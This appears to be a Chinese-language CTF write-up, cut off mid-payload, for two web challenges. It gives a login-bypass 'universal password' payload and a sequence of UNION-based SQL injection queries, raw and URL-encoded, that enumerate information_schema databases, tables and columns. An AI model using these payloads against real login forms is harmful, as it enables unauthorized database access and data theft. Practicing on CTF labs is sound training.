0x01 Easysql简单的sql注入,直接万能密码进去即可获得flag官方payload: admin/admin'||'10x02 Lovelysql访问页面提示我们flag在数据库中,尝试万能密码登陆发现登陆成功并且输出数据库中内容,尝试手工注入使用联合查询语句查询数据库admin'union+select+1,2,group_concat(schema_name)+from+information_schema.schemata#发现没有任何过滤,直接用hackbar自带的语句梭一把,查询数据表username=admin&password=admin'%20union%20select%201%2C2%2Cgroup_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3Ddatabase()%20%23查询数据表中的列:username=admin&password=admin%27%20union%20select%201%2C2%2Cgroup_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%3Ddatabase()%20%23查询数据username=admin&password=admin'%20union%20select%201%2C2%2Cgroup_con
………………………………
